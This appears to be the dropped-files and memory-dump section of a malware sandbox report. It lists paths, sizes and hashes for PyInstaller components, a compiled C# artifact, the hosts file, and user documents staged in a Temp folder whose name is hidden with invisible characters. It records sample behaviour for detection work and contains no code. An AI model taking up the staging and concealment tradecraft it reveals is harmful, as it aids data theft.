3999fc4e673cf2ce9938df5850270130247f4a96c249e01258a25b125d64c42c8683a85aec64ed9799d79b50f261bcfac6ee9de81f1c5252e044d02ac372e5c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\base_library.zip

Filesize
1.3MB

MD5
100dfe4e2eb2ce4726a43dbd4076b4ee

SHA1
5671116823ad50f18c7f0e45c612f41711cff8fe

SHA256
10b1adf18da86baebdbe7ee7561bc0ffa2aabf88e9f03cc34ab7943b25665769

SHA512
1b63f7841ea699c46c86568407d4f1cff21db9f5d57aecc374e3eae3c283349090d828df909f0213d1b177992b49caf22d5154958080fc06238e9e3b0cdf7bb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\blank.aes

Filesize
115KB

MD5
88244cf0f2593b7fabad1ccf5a85cdc9

SHA1
c84ea3ae0d5dcd733f05658e91f0af81f9a5b324

SHA256
9054a9fe20e347b5c2a86605602e4ab3d048e2be6d47663107e230c53fae048a

SHA512
cc9f74184257bda3d9353103db4b5fc037be85e73789f80a2f5812c81cc912f11aca35de1fc72f06dcb4abd1430ff21e3b692081357528918ead076072ef7686

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\python312.dll

Filesize
1.7MB

MD5
18677d48ba556e529b73d6e60afaf812

SHA1
68f93ed1e3425432ac639a8f0911c144f1d4c986

SHA256
8e2c03e1ee5068c16e61d3037a10371f2e9613221a165150008bef04474a8af8

SHA512
a843ab3a180684c4f5cae0240da19291e7ed9ae675c9356334386397561c527ab728d73767459350fa67624f389411d03665f69637c5f5c268011d1b103d0b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\select.pyd

Filesize
25KB

MD5
f5540323c6bb870b3a94e1b3442e597b

SHA1
2581887ffc43fa4a6cbd47f5d4745152ce40a5a7

SHA256
b3ff47c71e1023368e94314b6d371e01328dae9f6405398c72639129b89a48d2

SHA512
56ee1da2fb604ef9f30eca33163e3f286540d3f738ed7105fc70a2bccef7163e0e5afd0aeb68caf979d9493cd5a6a286e6943f6cd59c8e18902657807aa652e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\sqlite3.dll

Filesize
644KB

MD5
8a6c2b015c11292de9d556b5275dc998

SHA1
4dcf83e3b50970374eef06b79d323a01f5364190

SHA256
ad9afd1225847ae694e091b833b35aa03445b637e35fb2873812db358d783f29

SHA512
819f4e888831524ceeed875161880a830794a748add2bf887895d682db1cec29eaddc5eddf1e90d982f4c78a9747f960d75f7a87bdda3b4f63ea2f326db05387

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23042\unicodedata.pyd

Filesize
295KB

MD5
3f2da3ed690327ae6b320daa82d9be27

SHA1
32aebd8e8e17d6b113fc8f693259eba8b6b45ea5

SHA256
7dc64867f466b666ff1a209b0ef92585ffb7b0cac3a87c27e6434a2d7b85594f

SHA512
a4e6d58477baa35100aa946dfad42ad234f8affb26585d09f91cab89bbef3143fc45307967c9dbc43749ee06e93a94d87f436f5a390301823cd09e221cac8a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kjyahy5g.d2p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\o3pslupa\o3pslupa.dll

Filesize
4KB

MD5
9d1ad2ee3da4f1ebff5f5ad09bb4797f

SHA1
58f4d0da803aa81d0f3e0583ca5de029a79fe78a

SHA256
483b61dbcbd9ff9eb88f82008426d33463d4cde765b60ec71f305e2f9c9bfba5

SHA512
fb7aa2a131fd236f5503fed5e497bbea5771df2b50f37474e51b1a467062427cb92deb845d3cebab3b692fe68e39c5b16c7b805f6b020c9317b7fc205e0a4dbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\BackupStop.zip

Filesize
169KB

MD5
cdd70114b9a13bbe1ac26d840e1b066f

SHA1
7d1788f59961f06b68027801c0910b588a06090a

SHA256
8da85862298808fcb1711ccda7f6efe7a443822e737f1b7bd634252a6a24804e

SHA512
e8b69d628b58134753a3a1d7241fa28406e06f08da1c881a1643fc06574b9260b73530f36109d4c384b42c59538de99b61c67f37b47d9279f1b2fc98a5007a6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\CompressAdd.docx

Filesize
16KB

MD5
c4f402615a347ac4e2b09f5abe89287a

SHA1
3da7c5cb071365ca0d68f45154e494adf9aa9da3

SHA256
52eba0bd8efa383c5d7078c918977b41f80b36eeb09978ce5f60f4a707361445

SHA512
11c0eb8adfa5af841125cbcf27339805817774707e7fe09450fcdc8368927a2a6b0970e7ec35390c9658a77b72d2d3745234a492524ad8dec27c267a58550fb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\LockUnlock.docx

Filesize
13KB

MD5
0b2f1b154b368c3488615f481a0c95a6

SHA1
34542c8dcc4aeeb05a921824b6adf5c0c6473408

SHA256
8e7d7e11f6e320720d52f2da3bbcfe2b8b9c2f0ae692a2634a148779ee902095

SHA512
03c7af6756fb28c2673eed0240e32cf7822268b3e236672d9ad9ad7274487bbeb66e727e7a17c1b9104d883be3cbd7c6df67f9bffd6e9e874622eb73a3e5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\MergeUse.pdf

Filesize
266KB

MD5
13463b96de3088ef8fecde58cdfd7c29

SHA1
b47e0203fd53657986895d06ba539fdd52d7a4db

SHA256
2c87c0aa32dbe2b3b983119d7a6594406342482c75430946103cbd0baa79a2d0

SHA512
872670da9d64fa395c2012a9ae29089736cd83a612853e0674e60ca699a41854b22603f3d65725770c94e27fa83b367813d847b90e682152a71598b58ef462b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\PushClose.jpeg

Filesize
315KB

MD5
e901a632e237eb59153ebf82b17a31b3

SHA1
245016f8c8ecc1e08f18136eee7db81775a6ba62

SHA256
dcdbd635df1204872a316fd8d6f2b64213752cc73643a6ace3d847599d7e0a4b

SHA512
445ffc1073c637a31edc470dc42609549b89777007c61eec1bc9154d6c8f0a115c7d14a64886e8d39c3dcdd78a5555f19982721ee8fd89fd7ae2ae6f54c03d9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\SelectEnter.pdf

Filesize
375KB

MD5
125e50da83673b26177b4eab138cf0ce

SHA1
424544be6170273b2be8e843d8201f8f41d8b643

SHA256
f3242559cdd05e15f8c536339af23d34f6e5a9a4a366c28cdab7e7378db831e4

SHA512
c2c7e9f34ab6792a11562a22dbacad6091e68105f7d0416eb9624a57c448e7f6a269ccd9198315d5757e350ccf68cd0992a5027b2e38baca8d92d3fc3f546ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Desktop\ShowSuspend.png

Filesize
412KB

MD5
adda147f5fe17838e4b53cd1fc4ed852

SHA1
b64de76df79729150d7eee3f55a2b2a4721a7034

SHA256
9b805855fc9b5063f89d9170078be0397ea686ae7d5094fdf2260e8b8f4811b3

SHA512
778cb6ca12ef8dc76e7d85bffe1cdfaae9d7989f946f62af6b61da65c7efc2578511503b690e3958a26e1d38b7c54eac33e2ad2c02c58c3fcd2cd9856abcbcf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Documents\BlockOpen.doc

Filesize
1.1MB

MD5
5953ef8ba4d25a4e922435b83269e9b8

SHA1
7e214d32f8afaac04f6703a33c2171f9c01f2f92

SHA256
37b4959d3acb33477a44be16f99bec5cd2357a6be41be4593b85bf61713166cd

SHA512
752abd3cdbf74da0a5b27da57246b343e39e8e532d8d10da285efe7fa35bc5ab7b2ca17f5920c372892469a8b23bc12948a4fef3cc081bccb88ea80a78b35787

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Documents\EnterGroup.docx

Filesize
18KB

MD5
de09569f8afbb2cbb4b9a2e1efe944c2

SHA1
be97655d83d47211f6cd65085399b5017179018c

SHA256
34287a1b28476d766bd6da5cc361de91cd0d510a60f80e8a56a0ccf329c8225d

SHA512
958a071484aba2822784221ff97315696ce31b0335f641fa73728ccd5715282b5a33a52f9704abfbc4e732d0e1949840113208ed4c70adb7a95d305ac83c3481

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Documents\ExpandEnable.xlsx

Filesize
863KB

MD5
a71e6ac1f11f9ec8938c254dddfa7530

SHA1
0adf7ef7fb99499cc48d1cf906c6067bdec5cd3d

SHA256
e6e9016a88e5872609a73b4ae3b29c97df6def78bbac6ffc2f480084114b2414

SHA512
bd82b146a72bc70846e4fbbb2eec2c6dbe2dde033e7ce2006b721c153a8c0f68692cd24fe2146db3ba51afd09e16ddd90398d7a022229b6d57b3eb10cd9f1fb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Documents\GrantBackup.pdf

Filesize
885KB

MD5
b0853b5fbcc0fe2a572e21227b51fbfc

SHA1
ab13d7fc49c928255413bc192fc1fedec4b8418f

SHA256
bdcaaae57d73aa24bb3cc7bc18a58d14ba2037dc4da28836cd1786a024128eb6

SHA512
db127fc57553e892faf301331340afe51d9bd3621f99829fb2492edc8cab5e1c1c034792624ed0fa36465766d2c93ceb8c08749371494535557702e3462d34fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\    ‌ ‏\Common Files\Documents\NewStop.txt

Filesize
686KB

MD5
5f90c97e8a317b2755135ce2b9091410

SHA1
d805c529f68aa97e3bbcf83f760d2fb2914fd428

SHA256
b5b2bf4e294203115d2a67e412a56cbd5f53edacf1501d393e8838af00336ce3

SHA512
6cb76f3814f05952444e2a54a595bf669e09e5faf39705b2630403530f9c00978539d6a108f2088714faa7d3c2d033f0b54444c34c01c5ff27dbccd8258ca3a7

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o3pslupa\CSC40CBE5649C4E4768AB32B18A27AB5E0.TMP

Filesize
652B

MD5
1d8618cffe2980cea2b01744cc7b97df

SHA1
24b8104fe455c588defa50740b197a32625fd533

SHA256
b4f1cf31f4aa787b1e2b81a9eb79edd1f28f2f14ec527cf1d03eac55c0657306

SHA512
b47463c27f6dc1906ce18d3657fcccbf4aa89f4addd3b42348e8b56743d0eafaed99658aa826b5a1f7aa3d5febc9f2fbb81ca0d81daccabf7a8a11dc5fdbe4e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o3pslupa\o3pslupa.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o3pslupa\o3pslupa.cmdline

Filesize
607B

MD5
5c84b7010b068bd165db02c5a85e4e17

SHA1
aa58f56dace2b451cfb770ae7ed4a0c0b1114567

SHA256
8ed5671a736da1b488b8b6c42cae1e03b414c977f4077ce76a11e7ec467cf942

SHA512
3ae7da4179c00bcddf289d5b38e27af5aab12670412a76ef4fff63a780a5b37f717a029ca6e7415e651b99c5a5e7f53e6b1f9c366f76183d41699e15a2ece24f

Download Submit
memory/2036-56-0x00007FFD04850000-0x00007FFD0486A000-memory.dmp

Filesize
104KB

Download
memory/2036-348-0x00007FFD02970000-0x00007FFD02995000-memory.dmp

Filesize
148KB

Download
memory/2036-78-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp

Filesize
180KB

Download
memory/2036-81-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp

Filesize
1.1MB

Download
memory/2036-102-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp

Filesize
144KB

Download
memory/2036-79-0x00007FFD070D0000-0x00007FFD070DD000-memory.dmp

Filesize
52KB

Download
memory/2036-331-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp

Filesize
6.8MB

Download
memory/2036-76-0x00007FFD02880000-0x00007FFD02894000-memory.dmp

Filesize
80KB

Download
memory/2036-216-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp

Filesize
100KB

Download
memory/2036-70-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp

Filesize
6.8MB

Download
memory/2036-73-0x000002B328780000-0x000002B328CA9000-memory.dmp

Filesize
5.2MB

Download
memory/2036-74-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp

Filesize
5.2MB

Download
memory/2036-277-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp

Filesize
204KB

Download
memory/2036-72-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp

Filesize
820KB

Download
memory/2036-71-0x00007FFD02970000-0x00007FFD02995000-memory.dmp

Filesize
148KB

Download
memory/2036-66-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp

Filesize
204KB

Download
memory/2036-64-0x00007FFD07430000-0x00007FFD0743D000-memory.dmp

Filesize
52KB

Download
memory/2036-62-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp

Filesize
100KB

Download
memory/2036-60-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp

Filesize
1.5MB

Download
memory/2036-58-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp

Filesize
144KB

Download
memory/2036-31-0x00007FFD02970000-0x00007FFD02995000-memory.dmp

Filesize
148KB

Download
memory/2036-54-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp

Filesize
180KB

Download
memory/2036-343-0x00007FFD02880000-0x00007FFD02894000-memory.dmp

Filesize
80KB

Download
memory/2036-122-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp

Filesize
1.5MB

Download
memory/2036-295-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp

Filesize
5.2MB

Download
memory/2036-292-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp

Filesize
820KB

Download
memory/2036-293-0x000002B328780000-0x000002B328CA9000-memory.dmp

Filesize
5.2MB

Download
memory/2036-25-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp

Filesize
6.8MB

Download
memory/2036-316-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp

Filesize
6.8MB

Download
memory/2036-330-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp

Filesize
1.1MB

Download
memory/2036-322-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp

Filesize
1.5MB

Download
memory/2036-317-0x00007FFD02970000-0x00007FFD02995000-memory.dmp

Filesize
148KB

Download
memory/2036-346-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp

Filesize
5.2MB

Download
memory/2036-356-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp

Filesize
820KB

Download
memory/2036-355-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp

Filesize
204KB

Download
memory/2036-354-0x00007FFD07430000-0x00007FFD0743D000-memory.dmp

Filesize
52KB

Download
memory/2036-353-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp

Filesize
100KB

Download
memory/2036-352-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp

Filesize
1.5MB

Download
memory/2036-351-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp

Filesize
144KB

Download
memory/2036-350-0x00007FFD04850000-0x00007FFD0486A000-memory.dmp

Filesize
104KB

Download
memory/2036-349-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp

Filesize
180KB

Download
memory/2036-32-0x00007FFD077F0000-0x00007FFD077FF000-memory.dmp

Filesize
60KB

Download
memory/2036-347-0x00007FFD077F0000-0x00007FFD077FF000-memory.dmp

Filesize
60KB

Download
memory/2036-345-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp

Filesize
1.1MB

Download
memory/2036-344-0x00007FFD070D0000-0x00007FFD070DD000-memory.dmp

Filesize
52KB

Download
memory/2644-82-0x000002C147A10000-0x000002C147A32000-memory.dmp

Filesize
136KB

Download
memory/3568-214-0x00000281518D0000-0x00000281518D8000-memory.dmp

Filesize
32KB

Download